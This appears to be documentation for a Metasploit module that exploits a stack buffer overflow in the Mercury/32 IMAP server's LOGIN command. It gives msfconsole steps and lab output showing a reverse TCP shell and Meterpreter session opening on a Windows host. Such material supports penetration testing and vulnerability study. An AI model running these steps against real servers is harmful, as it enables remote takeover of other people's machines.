Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution.
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
This module has been tested successfully on:
- Mercury/32 v4.01a on Windows XP SP3 (x86)
- Mercury/32 v4.01a on Windows 7 SP1 (x86)
- Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
- Mercury/32 v4.01b on Windows 7 SP1 (x86)
- Install the vulnerable Mercury/32 application
- Start msfconsole
- Do:
use exploit/windows/imap/mercury_login - Do:
set RHOST IP - Do:
exploit - You should get a shell.
msf > use exploit/windows/imap/mercury_login1
msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
rhost => 192.168.46.144
msf exploit(windows/imap/mercury_login1) > exploit
[*] Started reverse TCP handler on 192.168.46.1:4444
[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
[*] Sending stage (179779 bytes) to 192.168.46.144
[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200
meterpreter >
Computer : WIN-DQ8ELRSOJAO
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows